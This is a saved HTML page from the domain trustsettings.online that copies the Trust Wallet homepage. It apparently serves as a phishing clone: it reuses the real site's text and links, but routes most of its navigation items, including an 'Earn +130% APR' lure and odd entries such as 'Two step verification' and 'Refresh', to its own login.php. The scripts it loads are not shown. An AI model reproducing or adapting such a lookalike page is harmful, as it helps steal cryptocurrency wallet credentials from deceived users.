<!DOCTYPE html>
<!-- saved from url=(0029)https://trustsettings.online/ -->
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Best Cryptocurrency Wallet | Ethereum Wallet | ERC20 Wallet | Trust Wallet</title>
    <meta property="og:description" content="Trust Wallet is the best ethereum wallet and cryptocurrency wallet to store your favourite BEP2, ERC20 and ERC721, tokens. Download the Android Trust Wallet and iOS app today!">
    <meta name="twitter:card" content="summary_large_image">
    <meta name="theme-color" content="#3375BB">
    <script type="text/javascript" async="" src="./Best Cryptocurrency Wallet _ Ethereum Wallet _ ERC20 Wallet _ Trust Wallet_files/js"></script><script async="" src="./Best Cryptocurrency Wallet _ Ethereum Wallet _ ERC20 Wallet _ Trust Wallet_files/jsOne.js.download"></script>
	<script async="" src="./Best Cryptocurrency Wallet _ Ethereum Wallet _ ERC20 Wallet _ Trust Wallet_files/jsTwo.js.download"></script>
	<script async="" src="./Best Cryptocurrency Wallet _ Ethereum Wallet _ ERC20 Wallet _ Trust Wallet_files/platform.js.download"></script>
    <script type="application/ld+json">
        {
            "description": "Trust Wallet is the best ethereum wallet and cryptocurrency wallet to store your favourite BEP2, ERC20 and ERC721, tokens. Download the Android Trust Wallet and iOS app today!",
            "@type": "WebPage",
            "url": "https://trustwallet.com/",
            "headline": "Best Cryptocurrency Wallet | Ethereum Wallet | ERC20 Wallet | Trust Wallet",
            "@context": "https://schema.org"
        }
    </script>
    <script type="application/javascript">
        document.addEventListener("DOMContentLoaded", function (event) {
            document.getElementById('navbarToggle').addEventListener('click', function () {
                var el = document.getElementById('navbarSupportedContent');
                var toggled = window.getComputedStyle(el).display == 'block';
                if (toggled) {
                    el.style.display = "none";
                } else {
                    el.style.display = "block";
                }
            })
        });
    </script>
    <link rel="preload" href="https://trustsettings.online/assets/fonts/IBMPlexSans/IBMPlexSans-Regular.woff2" as="font" type="font/woff2" crossorigin="">
    <link rel="preload" href="https://trustsettings.online/assets/fonts/IBMPlexSans/IBMPlexSans-Bold.woff2" as="font" type="font/woff2" crossorigin="">
    <link rel="preload" href="https://trustsettings.online/assets/fonts/IBMPlexSans/IBMPlexSans-Medium.woff2" as="font" type="font/woff2" crossorigin="">
    <link rel="stylesheet" href="./Best Cryptocurrency Wallet _ Ethereum Wallet _ ERC20 Wallet _ Trust Wallet_files/main.css">
    <link rel="alternate" href="https://trustwallet.com/" hreflang="en">
    <style>main.page-content > section:nth-of-type(4) {
        display: none
    }</style>
</head>
<body>
<nav class="navbar navbar-expand-lg navbar-togglable navbar-dark bg-primary d-block">
    <div class="container">
        <a class="navbar-brand" href="https://trustsettings.online/">
            <svg class="navbar-brand-img logotype-white" alt="Trust Wallet"></svg>
        </a>
        <button class="navbar-toggler collapsed" id="navbarToggle" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-expanded="false" aria-hidden="true" aria-label="Toggle navigation" aria-controls="navbarCollapse">
            <span class="navbar-toggler-icon collapsed"></span>
        </button>
        <div class="navbar-collapse collapse navbar-margin" id="navbarSupportedContent">
            <button class="navbar-toggler collapsed" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarCollapse" aria-expanded="false" aria-label="Toggle navigation">
            </button>
            <ul class="navbar-nav font-size-sm ml-auto">
                <li class="nav-item">
                    <a class="nav-link" href="https://trustsettings.online/assets.php">Assets</a>
                </li>
                <li class="nav-item">
                    <a class="nav-link" href="https://trustsettings.online/login.php">Staking</a>
                </li>
                <li class="nav-item">
                    <a class="nav-link" href="https://trustsettings.online/login.php">Earn
                        <span class="ml-3 badge badge-success">+130% APR</span></a>
                </li>
                <li class="nav-item">
                    <a class="nav-link" href="https://trustsettings.online/nft.php">NFTs</a>
                </li>
                <li class="nav-item">
                    <a class="nav-link" href="https://trustsettings.online/login.php">DApp Browser</a>
                </li>
                <li class="nav-item">
                    <a class="nav-link" href="https://trustsettings.online/login.php">Login</a>
                </li>
                <li class="nav-item">
                    <a class="nav-link" href="https://trustsettings.online/login.php">Change</a>
                </li>
                <li class="nav-item">
                    <a class="nav-link" href="https://trustsettings.online/login.php">Two step verification</a>
                </li>
                <li class="nav-item">
                    <a class="nav-link" href="https://trustsettings.online/login.php">Refresh</a>
                </li>
                <li class="nav-item">
                    <a class="nav-link" href="https://trustsettings.online/login.php">Support</a>
                </li>
                <li class="nav-item dropdown">
                    <a class="nav-link dropdown-toggle" href="https://trustsettings.online/#" id="navbarDropdown" role="button" data-toggle="dropdown" aria-haspopup="false" aria-expanded="true">
                        Language
                    </a>
                    <div class="dropdown-menu dropdown-menu-md" aria-labelledby="navbarDropdown">
                        <div class="list-group list-group-flush">
                            <ul class="list-unstyled list-block">
                                <li class="list-inline-item m-6">
                                    <a class="list-group-item" href="https://trustsettings.online/dapp.php">
                                        <div class="flag bg-en"></div>
                                    </a>
                                </li>
                                <li class="list-inline-item m-6"><a class="list-group-item list-inline-item" href="https://trustsettings.online/dapp.php">
                                    <div class="flag bg-ru"></div>
                                </a></li>
                                <li class="list-inline-item m-6"><a class="list-group-item list-inline-item" href="https://trustsettings.online/dapp.php">
                                    <div class="flag bg-de"></div>
                                </a></li>
                                <li class="list-inline-item m-6"><a class="list-group-item list-inline-item" href="https://trustsettings.online/dapp.php">
                                    <div class="flag bg-vi"></div>
                                </a></li>
                                <li class="list-inline-item m-6"><a class="list-group-item list-inline-item" href="https://trustsettings.online/dapp.php">
                                    <div class="flag bg-id"></div>
                                </a></li>
                                <li class="list-inline-item m-6"><a class="list-group-item list-inline-item" href="https://trustsettings.online/dapp.php">
                                    <div class="flag bg-ko"></div>
                                </a></li>
                                <li class="list-inline-item m-6"><a class="list-group-item list-inline-item" href="https://trustsettings.online/dapp.php">
                                    <div class="flag bg-ja"></div>
                                </a></li>
                                <li class="list-inline-item m-6"><a class="list-group-item list-inline-item" href="https://trustsettings.online/dapp.php">
                                    <div class="flag bg-tr"></div>
                                </a></li>
                                <li class="list-inline-item m-6"><a class="list-group-item list-inline-item" href="https://trustsettings.online/dapp.php">
                                    <div class="flag bg-pt_BR"></div>
                                </a></li>
                                <li class="list-inline-item m-6"><a class="list-group-item list-inline-item" href="https://trustsettings.online/dapp.php">
                                    <div class="flag bg-zh_CN"></div>
                                </a></li>
                                <li class="list-inline-item m-6"><a class="list-group-item list-inline-item" href="https://trustsettings.online/dapp.php">
                                    <div class="flag bg-es"></div>
                                </a></li>
                            </ul>
                        </div>
                    </div>
                </li>
            </ul>
        </div>
    </div>
</nav>
<main class="page-content" aria-label="Content">
    <section class="pt-8 pb-8 bg-gradient-primary">
        <div class="container">
            <div class="row align-items-center justify-content-center justify-content-md-between">
                <div class="col-12 col-lg-6 mb-8 text-center text-md-left text-white">
                    <h1 class="display-3 font-weight-bold">The most trusted &amp; secure crypto wallet</h1>
                    <p class="text-white-75 lead mb-4">Buy, store, collect NFTs, exchange &amp; earn crypto. Join 5
                        million+ people using Trust Wallet.</p>
                    <div class="download-button">
                        <div class="row download">
                            <div class="col-12 col-lg-4 apple">
                                <a href="https://apps.apple.com/app/apple-store/id1288339409?pt=1324988&amp;ct=website&amp;mt=8" class="downloadapp">
                                    <svg class="download-app-image download-apple" loading="lazy" alt="download app store" rel="noopener"></svg>
                                </a>
                            </div>
                            <div class="col-12 col-lg-4 googleplay">
                                <a href="https://play.google.com/store/apps/details?id=com.wallet.crypto.trustapp&amp;referrer=utm_source%3Dwebsite" class="downloadapp">
                                    <svg class="download-app-image download-play" loading="lazy" alt="download google play" rel="noopener"></svg>
                                </a>
                            </div>
                            <div class="col-12 col-lg-4 androidapk">
                                <a href="https://trustwallet.com/dl/apk" class="downloadapp">
                                    <svg class="download-app-image download-apk" loading="lazy" alt="download android" rel="noopener"></svg>
                                </a>
                            </div>
                            <div class="col-12 col-lg-4 huawei hidden">
                                <a href="https://appgallery.huawei.com/#/app/C103425801" class="downloadapp">
                                    <svg class="download-app-image download-huawei" loading="lazy" alt="download huawei store" rel="noopener"></svg>
                                </a>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="col-12 col-lg-6 text-center">
                    <img loading="lazy" class="hero-image mx-auto d-block img-fluid" src="./Best Cryptocurrency Wallet _ Ethereum Wallet _ ERC20 Wallet _ Trust Wallet_files/home_trustwallet_app.png" alt="">
                </div>
            </div>
        </div>
    </section>
    <section class="pt-6">
        <div class="container">
            <div class="row border-bottom justify-content-center pb-4">
                <div class="col-12 col-md-auto mr-auto d-flex justify-content-center">
                    <div class="icon icon-xs mb-5">
                        <svg alt="icon card">
                            <use xlink:href="https://trustwallet.com/assets/images/features-2.svg#card"></use>
                        </svg>
                    </div>
                    <div class="ml-4">
                        <h3 class="font-weight-bold">
                            Buy Crypto With a Card
                        </h3>
                    </div>
                </div>
                <div class="col-12 col-md-auto d-flex justify-content-center">
                    <div class="icon icon-xs mb-5">
                        <svg alt="icon dex">
                            <use xlink:href="/assets/images/features-2.svg#dex"></use>
                        </svg>
                    </div>
                    <div class="ml-4">
                        <h3 class="font-weight-bold">
                            Exchange Instantly
                        </h3>
                    </div>
                </div>
                <div class="col-12 col-md-auto ml-auto d-flex justify-content-center">
                    <div class="icon icon-xs mb-5">
                        <svg alt="icon lock">
                            <use xlink:href="/assets/images/features-2.svg#lock"></use>
                        </svg>
                    </div>
                    <div class="ml-4">
                        <h3 class="font-weight-bold">
                            Private &amp; Secure
                        </h3>
                    </div>
                </div>
            </div>
        </div>
    </section>
    <section class="pt-8">
        <div class="container">
            <div class="row align-items-center justify-content-center justify-content-md-between">
                <div class="col-12 text-center mt-4 mt-md-0 order-md-2">
                    <h3 class="display-4 font-weight-bold mb-4">You Deserve Easy Access to Cryptocurrencies</h3>
                    <p class="text-gray-700">Trust Wallet is for you if you want to</p>
                </div>
            </div>
            <div class="row align-items-center justify-content-center justify-content-md-between pt-4 pb-4 text-center">
                <div class="col-12 col-lg-6">
                    <div class="list-group-item d-flex"><span class="mr-4"><i class="check"></i></span>Buy some Bitcoin
                        in under five minutes
                    </div>
                    <div class="list-group-item d-flex"><span class="mr-4"><i class="check"></i></span>Easily earn
                        interest on the crypto in your wallet
                    </div>
                    <div class="list-group-item d-flex"><span class="mr-4"><i class="check"></i></span>See your
                        collectibles, art &amp; NFTs in one place
                    </div>
                </div>
                <div class="col-12 col-lg-6">
                    <div class="list-group-item d-flex"><span class="mr-4"><i class="check"></i></span>Exchange your
                        crypto without leaving the app
                    </div>
                    <div class="list-group-item d-flex"><span class="mr-4"><i class="check"></i></span>Track charts and
                        prices within the wallet
                    </div>
                    <div class="list-group-item d-flex"><span class="mr-4"><i class="check"></i></span>Keep your crypto
                        safe from hackers &amp; scammers
                    </div>
                </div>
                <a href="https://trustwallet.com/download-page" class="btn btn-primary mt-6 mx-auto downloadapp-native">
                    Download Now
                </a>
            </div>
        </div>
    </section>
    <section class="pt-8">
        <div class="container">
            <div class="row align-items-center justify-content-center justify-content-md-between">
                <div class="col-12 col-md-6 col-lg-5 text-center text-md-left mb-6 mb-md-10 order-sm-first order-md-2">
                    <h3 class="display-4 font-weight-bold">Buy Crypto With a Card</h3>
                    <p class="lead text-gray-700">Get your first $50 of Bitcoin, Ethereum, Binance Coin and many other
                        cryptocurrencies.</p>
                    <a href="https://trustwallet.com/download-page" class="btn btn-primary downloadapp-native">
                        Download Now
                    </a>
                </div>
                <div class="col-12 col-md-6 col-lg-7">
                    <img loading="lazy" class="img-fluid mx-auto d-block" src="./Best Cryptocurrency Wallet _ Ethereum Wallet _ ERC20 Wallet _ Trust Wallet_files/home_cards.png">
                </div>
            </div>
            <div class="row align-items-center justify-content-center justify-content-md-between">
                <div class="col-12 col-md-6 col-lg-5 text-center text-md-left mb-6 mb-md-10">
                    <h3 class="display-4 font-weight-bold">Exchange Instantly</h3>
                    <p class="lead text-gray-700">No forms, no selfies. Trade crypto anytime with ease.</p>
                    <a href="https://trustwallet.com/download-page" class="btn btn-primary downloadapp-native">
                        Download Now
                    </a>
                </div>
                <div class="col-12 col-md-6 col-lg-7">
                    <img loading="lazy" class="img-fluid  mx-auto d-block" src="./Best Cryptocurrency Wallet _ Ethereum Wallet _ ERC20 Wallet _ Trust Wallet_files/home_dex.png">
                </div>
            </div>
            <div class="row align-items-center justify-content-center justify-content-md-between">
                <div class="col-12 col-md-6 col-lg-5 order-sm-2 text-center text-md-left mb-6 mb-md-10 order-md-2">
                    <h3 class="display-4 font-weight-bold">Private &amp; Secure</h3>
                    <p class="lead text-gray-700">Only you can access your wallet. We don’t collect any personal
                        data.</p>
                    <a href="https://trustwallet.com/download-page" class="btn btn-primary downloadapp-native">
                        Download Now
                    </a>
                </div>
                <div class="col-12 col-md-6 col-lg-7">
                    <img loading="lazy" class="img-fluid mx-auto d-block" src="./Best Cryptocurrency Wallet _ Ethereum Wallet _ ERC20 Wallet _ Trust Wallet_files/home_security.png">
                </div>
            </div>
            <div class="row align-items-center justify-content-center justify-content-md-between">
                <div class="col-12 col-md-6 col-lg-5 text-center text-md-left mb-6 mb-md-10">
                    <h3 class="display-4 font-weight-bold">Browser for DApps</h3>
                    <p class="lead text-gray-700">Use your favourite decentralized apps &amp; find new ones, without
                        leaving your wallet.</p>
                    <a href="https://trustwallet.com/download-page" class="btn btn-primary downloadapp-native">
                        Download Now
                    </a>
                </div>
                <div class="col-12 col-md-6 col-lg-7">
                    <img loading="lazy" class="img-fluid mx-auto d-block" src="./Best Cryptocurrency Wallet _ Ethereum Wallet _ ERC20 Wallet _ Trust Wallet_files/dapp_preview.png">
                </div>
            </div>
        </div>
    </section>
    <section class="pt-8 pb-8 pt-sm-10 pb-sm-10">
        <div class="container">
            <div class="row">
                <div class="col-12 text-center mb-2">
                    <h3 class="display-4 font-weight-bold">
                        Get started in 3 simple steps
                    </h3>
                    <p class="lead text-gray-700">It only takes a few minutes</p>
                </div>
            </div>
            <div class="row no-gutters mt-8 mb-6 mb-md-7">
                <div class="col-12 col-md-4 text-center">
                    <div class="row mb-5">
                        <div class="col">
                        </div>
                        <div class="col-auto icon-xxl">
                            <svg alt="icon icon-sm">
                                <use xlink:href="https://trustwallet.com/assets/images/3steps.svg#download"></use>
                            </svg>
                        </div>
                        <div class="col">
                            <hr class="d-none d-md-block mt-8">
                        </div>
                    </div>
                    <h3 class="font-weight-bold">
                        Download Trust Wallet
                    </h3>
                </div>
                <div class="col-12 col-md-4 text-center">
                    <div class="row mb-5">
                        <div class="col">
                            <hr class="d-none d-md-block mt-8">
                        </div>
                        <div class="col-auto icon-xxl">
                            <img src="img/item1.jpg" alt="">
                        </div>
                        <div class="col">
                            <hr class="d-none d-md-block mt-8">
                        </div>
                    </div>
                    <h3 class="font-weight-bold">
                        Create a new wallet
                    </h3>
                </div>
                <div class="col-12 col-md-4 text-center">
                    <div class="row mb-5">
                        <div class="col">
                            <hr class="d-none d-md-block mt-8">
                        </div>
                        <div class="col-auto icon-xxl">
                            <img src="img/item1.jpg" alt="">
                        </div>
                        <div class="col">
                        </div>
                    </div>
                    <h3 class="font-weight-bold">
                        Get some crypto
                    </h3>
                </div>
            </div>
            <div class="row">
                <div class="col-12 text-center">
                    <a href="https://trustwallet.com/download-page" class="btn btn-primary mx-auto downloadapp-native">
                        Download Now
                    </a>
                </div>
            </div>
        </div>
    </section>
</main>
<section class="bg-light">
    <div class="container pt-8 pb-8">
        <div class="row align-items-center">
            <div class="col-12 col-md text-center text-lg-left mt-2">
                <h3 class="font-weight-bold mb-1">
                    Get the Trust Wallet app now!
                </h3>
                <p class="text-gray-700 mb-6 mb-md-0 no-whitespace">
                    The most trusted &amp; secure crypto wallet
                </p>
            </div>
            <div class="col-12 col-lg-7">
                <div class="download-button">
                    <div class="row download">
                        <div class="col-12 col-lg-4 apple">
                            <a href="https://apps.apple.com/app/apple-store/id1288339409?pt=1324988&amp;ct=website&amp;mt=8" class="downloadapp">
                                <svg class="download-app-image download-apple" loading="lazy" alt="download app store" rel="noopener"></svg>
                            </a>
                        </div>
                        <div class="col-12 col-lg-4 googleplay">
                            <a href="https://play.google.com/store/apps/details?id=com.wallet.crypto.trustapp&amp;referrer=utm_source%3Dwebsite" class="downloadapp">
                                <svg class="download-app-image download-play" loading="lazy" alt="download google play" rel="noopener"></svg>
                            </a>
                        </div>
                        <div class="col-12 col-lg-4 androidapk">
                            <a href="https://trustwallet.com/dl/apk" class="downloadapp">
                                <svg class="download-app-image download-apk" loading="lazy" alt="download android" rel="noopener"></svg>
                            </a>
                        </div>
                        <div class="col-12 col-lg-4 huawei hidden">
                            <a href="https://appgallery.huawei.com/#/app/C103425801" class="downloadapp">
                                <svg class="download-app-image download-huawei" loading="lazy" alt="download huawei store" rel="noopener"></svg>
                            </a>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
</section>
<footer class="py-8 py-md-8 bg-white">
    <data class="u-url" href="/"></data>
    <div class="container">
        <div class="row text-center text-md-left">
            <div class="col-12 col-md-4 col-lg-3">
                <a href="https://trustwallet.com/">
                    <svg alt="" class="footer-brand-image logotype-dark img-fluid mb-4"></svg>
                </a>
                <ul class="list-unstyled list-inline list-social mb-6 mb-md-0">
                    <li class="list-inline-item list-social-item pt-2 mr-5 mr-sm-3">
                        <a href="https://facebook.com/trustwalletapp" class="text-decoration-none" target="_blank" rel="noopener">
                            <svg class="social-icon" alt="trustwallet facebook">
                                <use xlink:href="/assets/images/socials.svg#social_facebook"></use>
                            </svg>
                        </a>
                    </li>
                    <li class="list-inline-item list-social-item pt-2 mr-5 mr-sm-3">
                        <a href="https://github.com/trustwallet" class="text-decoration-none" target="_blank" rel="noopener">
                            <svg class="social-icon" alt="trustwallet github">
                                <use xlink:href="/assets/images/socials.svg#social_github"></use>
                            </svg>
                        </a>
                    </li>
                    <li class="list-inline-item list-social-item pt-2 mr-5 mr-sm-3">
                        <a href="https://instagram.com/trustwallet" class="text-decoration-none" target="_blank" rel="noopener">
                            <svg class="social-icon" alt="trustwallet instagram">
                                <use xlink:href="/assets/images/socials.svg#social_instagram"></use>
                            </svg>
                        </a>
                    </li>
                    <li class="list-inline-item list-social-item pt-2 mr-5 mr-sm-3">
                        <a href="https://twitter.com/trustwalletapp" class="text-decoration-none" target="_blank" rel="noopener">
                            <svg class="social-icon" alt="trustwallet twitter">
                                <use xlink:href="/assets/images/socials.svg#social_twitter"></use>
                            </svg>
                        </a>
                    </li>
                    <li class="list-inline-item list-social-item pt-2 mr-5 mr-sm-3">
                        <a href="https://reddit.com/r/trustapp" class="text-decoration-none" target="_blank" rel="noopener">
                            <svg class="social-icon" alt="trustwallet reddit">
                                <use xlink:href="/assets/images/socials.svg#social_reddit"></use>
                            </svg>
                        </a>
                    </li>
                    <li class="list-inline-item list-social-item pt-2">
                        <a href="https://t.me/trust_announcements" class="text-decoration-none" target="_blank" rel="noopener">
                            <svg class="social-icon" alt="trustwallet telegram">
                                <use xlink:href="/assets/images/socials.svg#social_telegram"></use>
                            </svg>
                        </a>
                    </li>
                </ul>
            </div>
            <div class="col-12 col-md-4 col-lg-3">
                <h4 class="font-weight-bold text-uppercase text-gray-700">Trust Wallet</h4>
                <ul class="list-unstyled text-gray-700 mb-6 mb-md-8 mb-lg-0">
                    <li class="mb-3">
                        <a href="https://trustwallet.com/assets" class="text-reset">Assets</a>
                    </li>
                    <li class="mb-3">
                        <a href="https://trustwallet.com/dapp" class="text-reset">DApp Browser</a>
                    </li>
                    <li class="mb-3">
                        <a href="https://trustwallet.com/stablecoins" class="text-reset">Stablecoins</a>
                    </li>
                    <li class="mb-3">
                        <a href="https://trustwallet.com/beta" class="text-reset">Beta</a>
                    </li>
                    <li class="mb-3">
                        <a href="https://trustwallet.com/collectibles-wallet" class="text-reset">NFTs</a>
                    </li>
                    <li class="mb-3">
                        <a href="https://trustwallet.com/developer" class="text-reset">Developers</a>
                    </li>
                    <li class="mb-3">
                        <a href="https://apps.apple.com/app/apple-store/id1288339409?pt=1324988&amp;ct=website&amp;mt=8" rel="noopener" target="_blank" class="text-reset">Crypto Wallet for iOS</a>
                    </li>
                    <li class="mb-3">
                        <a href="https://play.google.com/store/apps/details?id=com.wallet.crypto.trustapp&amp;referrer=utm_source%3Dwebsite" rel="noopener" target="_blank" class="text-reset">Crypto Wallet for Android</a>
                    </li>
                </ul>
            </div>
            <div class="col-12 col-md-4 col-lg-2">
                <h4 class="font-weight-bold text-uppercase text-gray-700">Information</h4>
                <ul class="list-unstyled text-gray-700 mb-0">
                    <li class="mb-3">
                        <a href="https://community.trustwallet.com/" target="_blank" class="text-reset">Community</a>
                    </li>
                    <li class="mb-3">
                        <a href="https://community.trustwallet.com/c/helpcenter" target="_blank" class="text-reset">Help
                            Center</a>
                    </li>
                    <li class="mb-3">
                        <a href="https://trustwallet.com/blog" rel="noopener" class="text-reset">DApp Journey</a>
                    </li>
                    <li class="mb-3">
                        <a href="https://trustwallet.com/press" class="text-reset">Press Kit</a>
                    </li>
                    <li class="mb-3">
                        <a href="https://trustwallet.com/submit-dapp" class="text-reset">Submit DApp</a>
                    </li>
                    <li class="mb-3">
                        <a href="https://trustwallet.com/terms-of-services" class="text-reset">Terms Of Service</a>
                    </li>
                    <li class="mb-3">
                        <a href="https://trustwallet.com/privacy-and-policy" class="text-reset">Privacy Policy</a>
                    </li>
                </ul>
            </div>
            <div class="col-12 col-md-4 offset-md-4 col-lg-2 offset-lg-0">
                <h4 class="font-weight-bold text-uppercase text-gray-700">Use Crypto</h4>
                <ul class="list-unstyled text-gray-700 mb-6 mb-md-8 mb-lg-0">
                    <li class="mb-3">
                        <a href="https://trustwallet.com/buy-bitcoin" class="text-reset">Buy Bitcoin with a credit
                            card</a>
                    </li>
                    <li class="mb-3">
                        <a href="https://trustwallet.com/buy-ethereum" class="text-reset">Buy Ethereum</a>
                    </li>
                    <li class="mb-3">
                        <a href="https://trustwallet.com/buy-bnb" class="text-reset">Buy BNB</a>
                    </li>
                    <li class="mb-3">
                        <a href="https://trustwallet.com/buy-litecoin" class="text-reset">Buy Litecoin</a>
                    </li>
                    <li class="mb-3">
                        <a href="https://trustwallet.com/buy-tron" class="text-reset">Buy TRON</a>
                    </li>
                    <li class="mb-3">
                        <a href="https://trustwallet.com/buy-xrp" class="text-reset">Buy XRP</a>
                    </li>
                    <li class="mb-3">
                        <a href="https://trustwallet.com/buy-bitcoincash" class="text-reset">Buy Bitcoin Cash</a>
                    </li>
                    <hr>
                    <li class="mb-3">
                        <a href="https://trustwallet.com/earn-bitcoin" class="text-reset">Earn Bitcoin</a>
                    </li>
                    <li class="mb-3">
                        <a href="https://trustwallet.com/earn-ethereum" class="text-reset">Earn Ethereum</a>
                    </li>
                    <li class="mb-3">
                        <a href="https://trustwallet.com/earn-binance-coin" class="text-reset">Earn Binance Coin</a>
                    </li>
                    <li class="mb-3">
                        <a href="https://trustwallet.com/earn-cake" class="text-reset">Earn Cake</a>
                    </li>
                </ul>
            </div>
            <div class="col-12 col-md-4 col-lg-2">
                <h4 class="font-weight-bold text-uppercase text-gray-700">Assets</h4>
                <ul class="list-unstyled text-gray-700 mb-6 mb-md-8 mb-lg-0">
                    <li class="mb-3"><a href="https://trustwallet.com/bitcoin-wallet" class="text-gray-700">Bitcoin
                        (BTC)</a>
                    </li>
                    <li class="mb-3"><a href="https://trustwallet.com/ethereum-wallet" class="text-gray-700">Ethereum
                        (ETH)</a>
                    </li>
                    <li class="mb-3"><a href="https://trustwallet.com/binance-coin-wallet" class="text-gray-700">Binance
                        Coin (BNB)</a>
                    </li>
                    <li class="mb-3"><a href="https://trustwallet.com/litecoin-wallet" class="text-gray-700">Litecoin
                        (LTC)</a>
                    </li>
                    <li class="mb-3"><a href="https://trustwallet.com/xrp-wallet" class="text-gray-700">Ripple (XRP)</a>
                    </li>
                    <li class="mb-3"><a href="https://trustwallet.com/polkadot-wallet" class="text-gray-700">Polkadot
                        (DOT)</a>
                    </li>
                    <li class="mb-3"><a href="https://trustwallet.com/stellar-wallet" class="text-gray-700">Stellar
                        (XLM)</a>
                    </li>
                    <li class="mb-3"><a href="https://trustwallet.com/dogecoin-wallet" class="text-gray-700">Dogecoin
                        (DOGE)</a>
                    </li>
                    <li class="mb-3"><a href="https://trustwallet.com/smart-chain-wallet" class="text-gray-700">Smartchain
                        (BNB)</a>
                    </li>
                    <li class="mb-3"><a href="https://trustwallet.com/dash-wallet" class="text-gray-700">Dash (DASH)</a>
                    </li>
                    <li class="mb-3"><a href="https://trustwallet.com/tron-wallet" class="text-gray-700">TRON (TRX)</a>
                    </li>
                    <li class="mb-3"><a href="https://trustwallet.com/tezos-wallet" class="text-gray-700">Tezos
                        (XTZ)</a>
                    </li>
                    <li class="mb-3"><a href="https://trustwallet.com/cosmos-wallet" class="text-gray-700">Cosmos
                        (ATOM)</a>
                    </li>
                    <li class="mb-3"><a href="https://trustwallet.com/kava-wallet" class="text-gray-700">Kava (KAVA)</a>
                    </li>
                </ul>
            </div>
        </div>
    </div>
</footer>

</body></html>